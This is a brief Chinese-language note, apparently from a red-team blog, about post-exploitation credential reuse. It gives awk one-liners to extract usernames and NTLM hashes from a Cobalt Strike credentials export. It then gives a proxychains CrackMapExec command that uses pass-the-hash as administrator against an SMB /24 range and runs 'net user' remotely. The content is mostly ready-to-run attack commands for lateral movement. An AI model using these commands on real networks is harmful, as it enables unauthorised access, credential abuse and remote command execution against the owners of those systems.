前言
小记用命令直接提取cs里面导出来credentials.txt,方便进一步进行pth或者密码喷洒。
提取
注意需要把顶部的注释删除,如果凭证是包含明文的,需要手动处理一下。
提取用户名
awk -F":::" '{print $1}' credentials.txt | awk -F"\\" '{print $2}'
提取hash
awk -F":::" '{print $2}' credentials.txt
提取完就可以cme批量了
proxychains4 ./cme smb 10.0.0.1/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -d xx.org -x "net user"